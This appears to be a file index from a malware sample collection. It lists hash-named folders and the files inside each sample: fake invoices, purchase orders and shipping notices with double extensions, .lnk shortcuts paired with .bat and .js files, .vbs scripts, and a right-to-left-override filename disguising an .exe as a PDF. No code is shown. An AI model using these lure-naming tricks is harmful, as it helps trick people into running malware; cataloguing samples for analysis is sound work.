.\27137b14b278b8a32e57ef1b65c6ab352138d74a663a0425151026bd32934cde27137b14b278b8a32e57ef1b65c6ab352138d74a663a0425151026bd32934cde_1661938884"['.\27137b14b278b8a32e57ef1b65c6ab352138d74a663a0425151026bd32934cde_1661938884/invoice-not-paid-date08-08-22-pdf.lnk', '.\27137b14b278b8a32e57ef1b65c6ab352138d74a663a0425151026bd32934cde_1661938884/at/allTheyIntoWayMy.txt', '.\27137b14b278b8a32e57ef1b65c6ab352138d74a663a0425151026bd32934cde_1661938884/at/but.txt', '.\27137b14b278b8a32e57ef1b65c6ab352138d74a663a0425151026bd32934cde_1661938884/at/howOfWantThemGo.bat', '.\27137b14b278b8a32e57ef1b65c6ab352138d74a663a0425151026bd32934cde_1661938884/at/lookWouldHimOfCan.js', '.\27137b14b278b8a32e57ef1b65c6ab352138d74a663a0425151026bd32934cde_1661938884/at/time.gif']".\27137b14b278b8a32e57ef1b65c6ab352138d74a663a0425151026bd32934cde_1661938884/invoice-not-paid-date08-08-22-pdf.lnkat/howOfWantThemGo.bat
.\291305e67c10c9b3fd59e3aef8cb8a42d540f1bf85f7cf1f191b2c9dccd49207291305e67c10c9b3fd59e3aef8cb8a42d540f1bf85f7cf1f191b2c9dccd49207_1661938884['.\291305e67c10c9b3fd59e3aef8cb8a42d540f1bf85f7cf1f191b2c9dccd49207_1661938884/DELAY_NOTICE_NEW_SCHEDULE.vbs']
.\2a5b0507e53a4542d29ac0f2927991fc167c5dc1730dec07d1cfec0bd6bb28da2a5b0507e53a4542d29ac0f2927991fc167c5dc1730dec07d1cfec0bd6bb28da_1661938884['.\2a5b0507e53a4542d29ac0f2927991fc167c5dc1730dec07d1cfec0bd6bb28da_1661938884/TNT AWB & INVOICE.exe']
.\2b0237674998e86b1026b63cd9dddc291d6a66aff9e489e7e22824ab793687422b0237674998e86b1026b63cd9dddc291d6a66aff9e489e7e22824ab79368742_1661938884['.\2b0237674998e86b1026b63cd9dddc291d6a66aff9e489e7e22824ab79368742_1661938884/RFQ- P.0- 202208100237RO.vbs']
.\2b6b6537c88cdd2dc334678dc4f4c18a5da6501f2f69a01534e9cc58ad091db42b6b6537c88cdd2dc334678dc4f4c18a5da6501f2f69a01534e9cc58ad091db4_1661938884"['.\2b6b6537c88cdd2dc334678dc4f4c18a5da6501f2f69a01534e9cc58ad091db4_1661938884/Invoice-August-09-2022pdf.lnk', '.\2b6b6537c88cdd2dc334678dc4f4c18a5da6501f2f69a01534e9cc58ad091db4_1661938884/your/give.txt', '.\2b6b6537c88cdd2dc334678dc4f4c18a5da6501f2f69a01534e9cc58ad091db4_1661938884/your/say.txt', '.\2b6b6537c88cdd2dc334678dc4f4c18a5da6501f2f69a01534e9cc58ad091db4_1661938884/your/tell.txt', '.\2b6b6537c88cdd2dc334678dc4f4c18a5da6501f2f69a01534e9cc58ad091db4_1661938884/your/thing.gif', '.\2b6b6537c88cdd2dc334678dc4f4c18a5da6501f2f69a01534e9cc58ad091db4_1661938884/your/thingItsIAllThan.js', '.\2b6b6537c88cdd2dc334678dc4f4c18a5da6501f2f69a01534e9cc58ad091db4_1661938884/your/thoseEvenGetThemWhen.bat', '.\2b6b6537c88cdd2dc334678dc4f4c18a5da6501f2f69a01534e9cc58ad091db4_1661938884/your/upTheirOnNotShe.txt']".\2b6b6537c88cdd2dc334678dc4f4c18a5da6501f2f69a01534e9cc58ad091db4_1661938884/Invoice-August-09-2022pdf.lnkyour/thoseEvenGetThemWhen.bat
.\2d667431764746b8719e658145063d1ce52874101f190f3bb00b024ed0afe7962d667431764746b8719e658145063d1ce52874101f190f3bb00b024ed0afe796_1661938884"['.\2d667431764746b8719e658145063d1ce52874101f190f3bb00b024ed0afe796_1661938884/确认订单 # 880-H9100,pdf.exe']"
.\2d67f9bd9175fa8af0a0fe62539f379118ff7fe1e41e463751e643044e0735e82d67f9bd9175fa8af0a0fe62539f379118ff7fe1e41e463751e643044e0735e8_1661938884"['.\2d67f9bd9175fa8af0a0fe62539f379118ff7fe1e41e463751e643044e0735e8_1661938884/documents.lnk', '.\2d67f9bd9175fa8af0a0fe62539f379118ff7fe1e41e463751e643044e0735e8_1661938884/one/meLike.txt', '.\2d67f9bd9175fa8af0a0fe62539f379118ff7fe1e41e463751e643044e0735e8_1661938884/one/thinkTell.js', '.\2d67f9bd9175fa8af0a0fe62539f379118ff7fe1e41e463751e643044e0735e8_1661938884/one/yourCould.bat']".\2d67f9bd9175fa8af0a0fe62539f379118ff7fe1e41e463751e643044e0735e8_1661938884/documents.lnkone/yourCould.bat
.\2d6caf154d0aa24d0d3b6e3dfc427c57c55d8f72c96aaa4b53229babaaa8467e2d6caf154d0aa24d0d3b6e3dfc427c57c55d8f72c96aaa4b53229babaaa8467e_1661938884['.\2d6caf154d0aa24d0d3b6e3dfc427c57c55d8f72c96aaa4b53229babaaa8467e1661938884/Заказ на покупку(P.O46297408)ПЗЭМИ.exe']
.\2efaadaef5dc4f5b72b52b33f53cbfa0a2954c5b8837e30725763ff2538729292efaadaef5dc4f5b72b52b33f53cbfa0a2954c5b8837e30725763ff253872929_1661938884"['.\2efaadaef5dc4f5b72b52b33f53cbfa0a2954c5b8837e30725763ff253872929_1661938884/وثيقة طلب الطلب المرفقة 34552TY55,pdf.exe']"
.\2f35dba1b1fd6bf6661b61cbc88c4714a2459dc1f1d405fe26c6a7889f0c81112f35dba1b1fd6bf6661b61cbc88c4714a2459dc1f1d405fe26c6a7889f0c8111_1661938884['.\2f35dba1b1fd6bf6661b61cbc88c4714a2459dc1f1d405fe26c6a7889f0c8111_1661938884/PO # PR-10899.exe']
.\2fd4720e776afd9e93bc0ef36f74c85dd2fc3cd06b6df774039647a22873ef8d2fd4720e776afd9e93bc0ef36f74c85dd2fc3cd06b6df774039647a22873ef8d_1661938884
.\306102d305579d88b562318bbaebb140475f265d4c5b03cf28b2099aa876bcda306102d305579d88b562318bbaebb140475f265d4c5b03cf28b2099aa876bcda_1661938884"['.\306102d305579d88b562318bbaebb140475f265d4c5b03cf28b2099aa876bcda_1661938884/documents.lnk', '.\306102d305579d88b562318bbaebb140475f265d4c5b03cf28b2099aa876bcda_1661938884/one/aBy.js', '.\306102d305579d88b562318bbaebb140475f265d4c5b03cf28b2099aa876bcda_1661938884/one/comeBecause.bat', '.\306102d305579d88b562318bbaebb140475f265d4c5b03cf28b2099aa876bcda_1661938884/one/timeI.txt']".\306102d305579d88b562318bbaebb140475f265d4c5b03cf28b2099aa876bcda_1661938884/documents.lnkone/comeBecause.bat
.\3072b45d10b4b8d03bc3c6418095b01b76ece61ef0b24750441fa02f04b81f863072b45d10b4b8d03bc3c6418095b01b76ece61ef0b24750441fa02f04b81f86_1661938884['.\3072b45d10b4b8d03bc3c6418095b01b76ece61ef0b24750441fa02f04b81f86_1661938884/Kerin Karotamm. remise devis_pdf.exe']
.\30845a7676cee47809c601d673a0eb2ef116dbc16b3b466a4bea87c82867b07a30845a7676cee47809c601d673a0eb2ef116dbc16b3b466a4bea87c82867b07a_1661938884['.\30845a7676cee47809c601d673a0eb2ef116dbc16b3b466a4bea87c82867b07a_1661938884/Cerere de ofertă factură 2022-08-18.exe']
.\3118ae5d1126fe2fd3a1290cfd9fe7bba6bdf9fcc16985938e9836d57d30f6173118ae5d1126fe2fd3a1290cfd9fe7bba6bdf9fcc16985938e9836d57d30f617_1661938884"['.\3118ae5d1126fe2fd3a1290cfd9fe7bba6bdf9fcc16985938e9836d57d30f617_1661938884/Invoice-August-09-2022pdf.lnk', '.\3118ae5d1126fe2fd3a1290cfd9fe7bba6bdf9fcc16985938e9836d57d30f617_1661938884/your/give.txt', '.\3118ae5d1126fe2fd3a1290cfd9fe7bba6bdf9fcc16985938e9836d57d30f617_1661938884/your/nowThoseUseBecauseAs.txt', '.\3118ae5d1126fe2fd3a1290cfd9fe7bba6bdf9fcc16985938e9836d57d30f617_1661938884/your/orInHowPeopleWe.js', '.\3118ae5d1126fe2fd3a1290cfd9fe7bba6bdf9fcc16985938e9836d57d30f617_1661938884/your/say.txt', '.\3118ae5d1126fe2fd3a1290cfd9fe7bba6bdf9fcc16985938e9836d57d30f617_1661938884/your/tell.txt', '.\3118ae5d1126fe2fd3a1290cfd9fe7bba6bdf9fcc16985938e9836d57d30f617_1661938884/your/theThingWithInWay.bat', '.\3118ae5d1126fe2fd3a1290cfd9fe7bba6bdf9fcc16985938e9836d57d30f617_1661938884/your/thing.gif']".\3118ae5d1126fe2fd3a1290cfd9fe7bba6bdf9fcc16985938e9836d57d30f617_1661938884/Invoice-August-09-2022pdf.lnkyour/theThingWithInWay.bat
.\328a06f4659bc21e822a326175fa9e35266a4b9535aeb5deb21170fbb549a41b328a06f4659bc21e822a326175fa9e35266a4b9535aeb5deb21170fbb549a41b_1661938884['.\328a06f4659bc21e822a326175fa9e35266a4b9535aeb5deb21170fbb549a41b_1661938884/RFQ- P.0-202208160237LB.exe']
.\32b380e7b6ee0e7ab296ffe91cad2d88209d38d884694a6851557977966b284932b380e7b6ee0e7ab296ffe91cad2d88209d38d884694a6851557977966b2849_1661938884['.\32b380e7b6ee0e7ab296ffe91cad2d88209d38d884694a6851557977966b2849_1661938884/PVM Sąskaitą-Faktūrą_2022 08 14_pdf.exe']
.\33ced2dfc65aab1dfe9a994c1eb1d02261166aefbff46e4787ac4c09944e36a333ced2dfc65aab1dfe9a994c1eb1d02261166aefbff46e4787ac4c09944e36a3_1661938884['.\33ced2dfc65aab1dfe9a994c1eb1d02261166aefbff46e4787ac4c09944e36a3_1661938884/DHL出货通知:2121015942.exe']
.\33e97aea71cba2560138b54c0c9f2f77f0c55d2c4f52ae8505c6a04a8c351ec033e97aea71cba2560138b54c0c9f2f77f0c55d2c4f52ae8505c6a04a8c351ec0_1661938884['.\33e97aea71cba2560138b54c0c9f2f77f0c55d2c4f52ae8505c6a04a8c351ec0_1661938884/TNT AWB AND INVOICE.exe']
.\3447c62ed4f9f34c10341ca5a33080bf141634b6156bd41e1adb6fb7865ec4be3447c62ed4f9f34c10341ca5a33080bf141634b6156bd41e1adb6fb7865ec4be_1661938884"['.\3447c62ed4f9f34c10341ca5a33080bf141634b6156bd41e1adb6fb7865ec4be_1661938884/Sipariş 501527,pdf.exe']"
.\36105d15bcda30709515cca798cdff377a248fa08afa2dafb8f3a3077eb9465f36105d15bcda30709515cca798cdff377a248fa08afa2dafb8f3a3077eb9465f_1661938884"['.\36105d15bcda30709515cca798cdff377a248fa08afa2dafb8f3a3077eb9465f_1661938884/Invoice-August-09-2022pdf.lnk', '.\36105d15bcda30709515cca798cdff377a248fa08afa2dafb8f3a3077eb9465f_1661938884/your/dayWellSoTakeIts.bat', '.\36105d15bcda30709515cca798cdff377a248fa08afa2dafb8f3a3077eb9465f_1661938884/your/give.txt', '.\36105d15bcda30709515cca798cdff377a248fa08afa2dafb8f3a3077eb9465f_1661938884/your/makeThoseFromLookMake.js', '.\36105d15bcda30709515cca798cdff377a248fa08afa2dafb8f3a3077eb9465f_1661938884/your/say.txt', '.\36105d15bcda30709515cca798cdff377a248fa08afa2dafb8f3a3077eb9465f_1661938884/your/tell.txt', '.\36105d15bcda30709515cca798cdff377a248fa08afa2dafb8f3a3077eb9465f_1661938884/your/thing.gif', '.\36105d15bcda30709515cca798cdff377a248fa08afa2dafb8f3a3077eb9465f_1661938884/your/wayHereYourYouHave.txt']".\36105d15bcda30709515cca798cdff377a248fa08afa2dafb8f3a3077eb9465f_1661938884/Invoice-August-09-2022pdf.lnkyour/dayWellSoTakeIts.bat
.\369d2fd7604592ad2045949574012961651ec5cf8113b5d170e7956963c44ab1369d2fd7604592ad2045949574012961651ec5cf8113b5d170e7956963c44ab1_1661938884"['.\369d2fd7604592ad2045949574012961651ec5cf8113b5d170e7956963c44ab1_1661938884/documents.lnk', '.\369d2fd7604592ad2045949574012961651ec5cf8113b5d170e7956963c44ab1_1661938884/then/by.txt', '.\369d2fd7604592ad2045949574012961651ec5cf8113b5d170e7956963c44ab1_1661938884/then/day.gif', '.\369d2fd7604592ad2045949574012961651ec5cf8113b5d170e7956963c44ab1_1661938884/then/he.png', '.\369d2fd7604592ad2045949574012961651ec5cf8113b5d170e7956963c44ab1_1661938884/then/intoYouMeHereGive.txt', '.\369d2fd7604592ad2045949574012961651ec5cf8113b5d170e7956963c44ab1_1661938884/then/tellTwoOrAllWhich.bat', '.\369d2fd7604592ad2045949574012961651ec5cf8113b5d170e7956963c44ab1_1661938884/then/thenFirstToAsThe.js', '.\369d2fd7604592ad2045949574012961651ec5cf8113b5d170e7956963c44ab1_1661938884/then/use.txt']".\369d2fd7604592ad2045949574012961651ec5cf8113b5d170e7956963c44ab1_1661938884/documents.lnkthen/tellTwoOrAllWhich.bat
.\376e0d80dec3ac91b70bf15c87b2bce34bf5488e626f21890fa38faca621837f376e0d80dec3ac91b70bf15c87b2bce34bf5488e626f21890fa38faca621837f_1661938884['.\376e0d80dec3ac91b70bf15c87b2bce34bf5488e626f21890fa38faca621837f_1661938884/SKM-2022081507273514KW.vbs']
.\37a4656764bb345783e8acdc00bf13ad8cca67ec4b0b2bbc7a9f70a854d6618537a4656764bb345783e8acdc00bf13ad8cca67ec4b0b2bbc7a9f70a854d66185_1661938884['.\37a4656764bb345783e8acdc00bf13ad8cca67ec4b0b2bbc7a9f70a854d66185_1661938884/Booking.com Reservation review for refund.pdf.hta;1']
.\37aa0673a41931f0e8d6a40592615a731affd3a9122c422eb42c33697d7b9d8237aa0673a41931f0e8d6a40592615a731affd3a9122c422eb42c33697d7b9d82_1661938884"['.\37aa0673a41931f0e8d6a40592615a731affd3a9122c422eb42c33697d7b9d82_1661938884/documents.lnk', '.\37aa0673a41931f0e8d6a40592615a731affd3a9122c422eb42c33697d7b9d82_1661938884/then/alsoLookWhichAboutWho.txt', '.\37aa0673a41931f0e8d6a40592615a731affd3a9122c422eb42c33697d7b9d82_1661938884/then/by.txt', '.\37aa0673a41931f0e8d6a40592615a731affd3a9122c422eb42c33697d7b9d82_1661938884/then/day.gif', '.\37aa0673a41931f0e8d6a40592615a731affd3a9122c422eb42c33697d7b9d82_1661938884/then/he.png', '.\37aa0673a41931f0e8d6a40592615a731affd3a9122c422eb42c33697d7b9d82_1661938884/then/hisDayAtThisLike.bat', '.\37aa0673a41931f0e8d6a40592615a731affd3a9122c422eb42c33697d7b9d82_1661938884/then/use.txt', '.\37aa0673a41931f0e8d6a40592615a731affd3a9122c422eb42c33697d7b9d82_1661938884/then/wellTellThisYearOr.js']".\37aa0673a41931f0e8d6a40592615a731affd3a9122c422eb42c33697d7b9d82_1661938884/documents.lnkthen/hisDayAtThisLike.bat
.\381a8244dd806967a83c6b0991e7c7e4f0515d653a29650940fc3980504f3023381a8244dd806967a83c6b0991e7c7e4f0515d653a29650940fc3980504f3023_1661938884['.\381a8244dd806967a83c6b0991e7c7e4f0515d653a29650940fc3980504f3023_1661938884/Confirmation Order SEB554561 dated 15 08 2022.vbs']
.\38b150b0606ad8624a411f814aeabeeb336c25bfd035b9fe96326fa69777003c38b150b0606ad8624a411f814aeabeeb336c25bfd035b9fe96326fa69777003c_1661938884"['.\38b150b0606ad8624a411f814aeabeeb336c25bfd035b9fe96326fa69777003c_1661938884/Reseter T11 Working - 16-Nov-2009/AdjProg.exe', '.\38b150b0606ad8624a411f814aeabeeb336c25bfd035b9fe96326fa69777003c_1661938884/Reseter T11 Working - 16-Nov-2009/Loader.exe', '.\38b150b0606ad8624a411f814aeabeeb336c25bfd035b9fe96326fa69777003c_1661938884/Reseter T11 Working - 16-Nov-2009/ReadMe!!! Urgent !!!.txt', '.\38b150b0606ad8624a411f814aeabeeb336c25bfd035b9fe96326fa69777003c_1661938884/Reseter T11 Working - 16-Nov-2009/StrGene.dll', '.\38b150b0606ad8624a411f814aeabeeb336c25bfd035b9fe96326fa69777003c_1661938884/Reseter T11 Working - 16-Nov-2009/apdadrv.dll', '.\38b150b0606ad8624a411f814aeabeeb336c25bfd035b9fe96326fa69777003c_1661938884/Reseter T11 Working - 16-Nov-2009/auto.bat', '.\38b150b0606ad8624a411f814aeabeeb336c25bfd035b9fe96326fa69777003c_1661938884/Reseter T11 Working - 16-Nov-2009/eps.tmp', '.\38b150b0606ad8624a411f814aeabeeb336c25bfd035b9fe96326fa69777003c_1661938884/Reseter T11 Working - 16-Nov-2009/null']"
.\38f898cc9126909f92d25c7f97ef4e5f35f5517a1f6feed07bc36f2c922d462238f898cc9126909f92d25c7f97ef4e5f35f5517a1f6feed07bc36f2c922d4622_1661938884['.\38f898cc9126909f92d25c7f97ef4e5f35f5517a1f6feed07bc36f2c922d4622_1661938884/DHL Delivery Invoice.pdf.exe']
.\3a9db0cf81be8a58145b18b5d698ab3c53b7fae86b6443ef6e404fa7b85a0f4a3a9db0cf81be8a58145b18b5d698ab3c53b7fae86b6443ef6e404fa7b85a0f4a_1661938884"['.\3a9db0cf81be8a58145b18b5d698ab3c53b7fae86b6443ef6e404fa7b85a0f4a_1661938884/RFQ _Nuevo pedido - E5517,pdf.exe']"
.\3b1d12553b369cbc73e9e27aec7ac36d4e0202a060cd4c3e1508dcf4d209fce23b1d12553b369cbc73e9e27aec7ac36d4e0202a060cd4c3e1508dcf4d209fce2_1661938884['.\3b1d12553b369cbc73e9e27aec7ac36d4e0202a060cd4c3e1508dcf4d209fce2_1661938884/Docu0020.exe;1']
.\3b2d411de1a24cac614d8fbd0a71da03f7f6ee1723f94c4d7b23878506be4e063b2d411de1a24cac614d8fbd0a71da03f7f6ee1723f94c4d7b23878506be4e06_1661938884"['.\3b2d411de1a24cac614d8fbd0a71da03f7f6ee1723f94c4d7b23878506be4e06_1661938884/Invoice-August-09-2022pdf.lnk', '.\3b2d411de1a24cac614d8fbd0a71da03f7f6ee1723f94c4d7b23878506be4e06_1661938884/your/aboutLikeLikeHowTell.txt', '.\3b2d411de1a24cac614d8fbd0a71da03f7f6ee1723f94c4d7b23878506be4e06_1661938884/your/give.txt', '.\3b2d411de1a24cac614d8fbd0a71da03f7f6ee1723f94c4d7b23878506be4e06_1661938884/your/manyByYearAtA.js', '.\3b2d411de1a24cac614d8fbd0a71da03f7f6ee1723f94c4d7b23878506be4e06_1661938884/your/notThanGoBeVery.bat', '.\3b2d411de1a24cac614d8fbd0a71da03f7f6ee1723f94c4d7b23878506be4e06_1661938884/your/say.txt', '.\3b2d411de1a24cac614d8fbd0a71da03f7f6ee1723f94c4d7b23878506be4e06_1661938884/your/tell.txt', '.\3b2d411de1a24cac614d8fbd0a71da03f7f6ee1723f94c4d7b23878506be4e06_1661938884/your/thing.gif']".\3b2d411de1a24cac614d8fbd0a71da03f7f6ee1723f94c4d7b23878506be4e06_1661938884/Invoice-August-09-2022pdf.lnkyour/notThanGoBeVery.bat
.\3ba9e82575262067725feda9cefac9a6a6350ead5037ae9d85c398a0ecf6c6eb3ba9e82575262067725feda9cefac9a6a6350ead5037ae9d85c398a0ecf6c6eb_1661938884['.\3ba9e82575262067725feda9cefac9a6a6350ead5037ae9d85c398a0ecf6c6eb_1661938884/見積のリクエスト:RFQ-2022080902401220JP.exe']
.\3c5433a3b972579c2e5c9a5d9cad334d4503cd9e1f444d084451ca4ac1bb539f3c5433a3b972579c2e5c9a5d9cad334d4503cd9e1f444d084451ca4ac1bb539f_1661938884"['.\3c5433a3b972579c2e5c9a5d9cad334d4503cd9e1f444d084451ca4ac1bb539f_1661938884/MURATA PURCHASE ORDER,pdf.exe']"
.\3d0c5d4e14e8e744115741b9818603c174b6d1210a0dd30622cd84c9174a1efb3d0c5d4e14e8e744115741b9818603c174b6d1210a0dd30622cd84c9174a1efb_1661938884['.\3d0c5d4e14e8e744115741b9818603c174b6d1210a0dd30622cd84c9174a1efb_1661938884/2094677125591.exe']
.\3d5a1d412e3cfdf456e922228d638330490d427e40fbe3e641ce495d7392a4503d5a1d412e3cfdf456e922228d638330490d427e40fbe3e641ce495d7392a450_1661938884['.\3d5a1d412e3cfdf456e922228d638330490d427e40fbe3e641ce495d7392a450_1661938884/報價請求:鑰匙AS532- TW835.exe']
.\3e932c1f6530909e5c67adce4a89f2c4b4b5e36026f28e96fb96fce31d7d7c6b3e932c1f6530909e5c67adce4a89f2c4b4b5e36026f28e96fb96fce31d7d7c6b_1661938884"['.\3e932c1f6530909e5c67adce4a89f2c4b4b5e36026f28e96fb96fce31d7d7c6b_1661938884/documents.lnk', '.\3e932c1f6530909e5c67adce4a89f2c4b4b5e36026f28e96fb96fce31d7d7c6b_1661938884/then/by.txt', '.\3e932c1f6530909e5c67adce4a89f2c4b4b5e36026f28e96fb96fce31d7d7c6b_1661938884/then/day.gif', '.\3e932c1f6530909e5c67adce4a89f2c4b4b5e36026f28e96fb96fce31d7d7c6b_1661938884/then/he.png', '.\3e932c1f6530909e5c67adce4a89f2c4b4b5e36026f28e96fb96fce31d7d7c6b_1661938884/then/manyTheyHerHimBecause.js', '.\3e932c1f6530909e5c67adce4a89f2c4b4b5e36026f28e96fb96fce31d7d7c6b_1661938884/then/ofThenHisOtherSay.bat', '.\3e932c1f6530909e5c67adce4a89f2c4b4b5e36026f28e96fb96fce31d7d7c6b_1661938884/then/oneAtBeComeCome.txt', '.\3e932c1f6530909e5c67adce4a89f2c4b4b5e36026f28e96fb96fce31d7d7c6b_1661938884/then/use.txt']".\3e932c1f6530909e5c67adce4a89f2c4b4b5e36026f28e96fb96fce31d7d7c6b_1661938884/documents.lnkthen/ofThenHisOtherSay.bat
.\3f994edced7d214da16cebd0e6e7405c5b04dd3f1bd6beaba940c6611d2e47903f994edced7d214da16cebd0e6e7405c5b04dd3f1bd6beaba940c6611d2e4790_1661938884['.\3f994edced7d214da16cebd0e6e7405c5b04dd3f1bd6beaba940c6611d2e4790_1661938884/DELAY_NOTICE_NEW_SHIPMENT_SCHEDULE.vbs']
.\3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f33fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3_1661938884"['.\3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3_1661938884/CS_installer.exe', '.\3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3_1661938884/CS_installer.pdb', '.\3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3_1661938884/CS_installer.exe.config', '.\3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3_1661938884/Microsoft.Win32.TaskScheduler.dll', '.\3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3_1661938884/_meta.txt', '.\3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3_1661938884/de/Microsoft.Win32.TaskScheduler.resources.dll', '.\3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3_1661938884/es/Microsoft.Win32.TaskScheduler.resources.dll', '.\3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3_1661938884/fr/Microsoft.Win32.TaskScheduler.resources.dll', '.\3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3_1661938884/it/Microsoft.Win32.TaskScheduler.resources.dll', '.\3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3_1661938884/pl/Microsoft.Win32.TaskScheduler.resources.dll', '.\3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3_1661938884/ru/Microsoft.Win32.TaskScheduler.resources.dll', '.\3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3_1661938884/zh-CN/Microsoft.Win32.TaskScheduler.resources.dll']"
.\3fd277c3b8ed6454ffd054ff29389e7b4cd4a8af6ccdf006b42d7bb39e7a81343fd277c3b8ed6454ffd054ff29389e7b4cd4a8af6ccdf006b42d7bb39e7a8134_1661938884['.\3fd277c3b8ed6454ffd054ff29389e7b4cd4a8af6ccdf006b42d7bb39e7a8134_1661938884/DHL Shipment Notification.pdf.exe']
.\40bd0dcc762fb84e09723adc56002d427058d7ab975f50fd764a76e08bdfc47440bd0dcc762fb84e09723adc56002d427058d7ab975f50fd764a76e08bdfc474_1661938884"['.\40bd0dcc762fb84e09723adc56002d427058d7ab975f50fd764a76e08bdfc474_1661938884/Sipariş Metak_WJO-001,pdf.exe']"
.\40e6c8c365e8a4de4e926486443bf7db0e7bd00cee3a0206caa8e80cb290b8b540e6c8c365e8a4de4e926486443bf7db0e7bd00cee3a0206caa8e80cb290b8b5_1661938884['.\40e6c8c365e8a4de4e926486443bf7db0e7bd00cee3a0206caa8e80cb290b8b5_1661938884/STATEMENT OF ACCOUNT.exe']
.\414727f6bcab9b92ba504ae41b31157aa83198eeb3710a5e63e915e1c7edcd9a414727f6bcab9b92ba504ae41b31157aa83198eeb3710a5e63e915e1c7edcd9a_1661938884['.\414727f6bcab9b92ba504ae41b31157aa83198eeb3710a5e63e915e1c7edcd9a_1661938884/PO3177008142 \u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202efdp.exe']
.\42bbe8f596f439a07574adcb83453f52f4c8ce61d3dd916aacc37a647b3f8c3d42bbe8f596f439a07574adcb83453f52f4c8ce61d3dd916aacc37a647b3f8c3d_1661938884"['.\42bbe8f596f439a07574adcb83453f52f4c8ce61d3dd916aacc37a647b3f8c3d_1661938884/ORDEN DE COMPRA DE A.W. Chesterton,pdf.exe']"
.\44f80d2a6a59d6f19ec30143e7d6f1488c971907f973764d12b9fc448b9378c144f80d2a6a59d6f19ec30143e7d6f1488c971907f973764d12b9fc448b9378c1_1661938884['.\44f80d2a6a59d6f19ec30143e7d6f1488c971907f973764d12b9fc448b9378c1_1661938884/VPO_SP.9686_Flex_rev_2_BL6534368.exe']
.\455a7127b79c6ab1e5ec767bed1d0f6420524dbf3a2fb6037c779ce863828118455a7127b79c6ab1e5ec767bed1d0f6420524dbf3a2fb6037c779ce863828118_1661938884"['.\455a7127b79c6ab1e5ec767bed1d0f6420524dbf3a2fb6037c779ce863828118_1661938884/N.° de pedido NUEVO MGE-PO-2022-029, PDF.exe']"
.\4683295f5ab80ab5fda437ca73b1bde70b5e147cd266ea4b23521273934043684683295f5ab80ab5fda437ca73b1bde70b5e147cd266ea4b2352127393404368_1661938884"['.\4683295f5ab80ab5fda437ca73b1bde70b5e147cd266ea4b2352127393404368_1661938884/documents.lnk', '.\4683295f5ab80ab5fda437ca73b1bde70b5e147cd266ea4b2352127393404368_1661938884/their/as.txt', '.\4683295f5ab80ab5fda437ca73b1bde70b5e147cd266ea4b2352127393404368_1661938884/their/from.txt', '.\4683295f5ab80ab5fda437ca73b1bde70b5e147cd266ea4b2352127393404368_1661938884/their/meManGetOneOnly.bat', '.\4683295f5ab80ab5fda437ca73b1bde70b5e147cd266ea4b2352127393404368_1661938884/their/themCouldPeopleAThink.txt', '.\4683295f5ab80ab5fda437ca73b1bde70b5e147cd266ea4b2352127393404368_1661938884/their/who.jpg', '.\4683295f5ab80ab5fda437ca73b1bde70b5e147cd266ea4b2352127393404368_1661938884/their/yearWellLikeOnlyKnow.js']".\4683295f5ab80ab5fda437ca73b1bde70b5e147cd266ea4b2352127393404368_1661938884/documents.lnktheir/meManGetOneOnly.bat
.\48e84625a43a7452caa3dbec59e4ab51f97f41de0878dc32f6aa7464be71e86f48e84625a43a7452caa3dbec59e4ab51f97f41de0878dc32f6aa7464be71e86f_1661938884['.\48e84625a43a7452caa3dbec59e4ab51f97f41de0878dc32f6aa7464be71e86f_1661938884/R RC5000 OFFERTA 512_pdf.exe']
.\49be46025d2f9068312800411d8150d9a3533bb3ae153624a8f58f7be3a8453949be46025d2f9068312800411d8150d9a3533bb3ae153624a8f58f7be3a84539_1661938884"['.\49be46025d2f9068312800411d8150d9a3533bb3ae153624a8f58f7be3a84539_1661938884/REVISIÓN DE COMPRA DE PLUSSTEEL 23244FG,pdf.exe']"
.\4b065658564ed75687133f216a0aba6442e912d073392fb819db9e1f17ac55044b065658564ed75687133f216a0aba6442e912d073392fb819db9e1f17ac5504_1661938884"['.\4b065658564ed75687133f216a0aba6442e912d073392fb819db9e1f17ac5504_1661938884/Invoice-August-09-2022pdf.lnk', '.\4b065658564ed75687133f216a0aba6442e912d073392fb819db9e1f17ac5504_1661938884/your/butDoFindManOr.js', '.\4b065658564ed75687133f216a0aba6442e912d073392fb819db9e1f17ac5504_1661938884/your/give.txt', '.\4b065658564ed75687133f216a0aba6442e912d073392fb819db9e1f17ac5504_1661938884/your/itsNoWantThenGet.bat', '.\4b065658564ed75687133f216a0aba6442e912d073392fb819db9e1f17ac5504_1661938884/your/peopleHowComeWantOnly.txt', '.\4b065658564ed75687133f216a0aba6442e912d073392fb819db9e1f17ac5504_1661938884/your/say.txt', '.\4b065658564ed75687133f216a0aba6442e912d073392fb819db9e1f17ac5504_1661938884/your/tell.txt', '.\4b065658564ed75687133f216a0aba6442e912d073392fb819db9e1f17ac5504_1661938884/your/thing.gif']".\4b065658564ed75687133f216a0aba6442e912d073392fb819db9e1f17ac5504_1661938884/Invoice-August-09-2022pdf.lnkyour/itsNoWantThenGet.bat
.\4d175a4a5bbd3a45ea8849477913a89178f11a07ddcebc2f03db7058652c0ae94d175a4a5bbd3a45ea8849477913a89178f11a07ddcebc2f03db7058652c0ae9_1661938884['.\4d175a4a5bbd3a45ea8849477913a89178f11a07ddcebc2f03db7058652c0ae9_1661938884/hesaphareketi-01.exe;1']
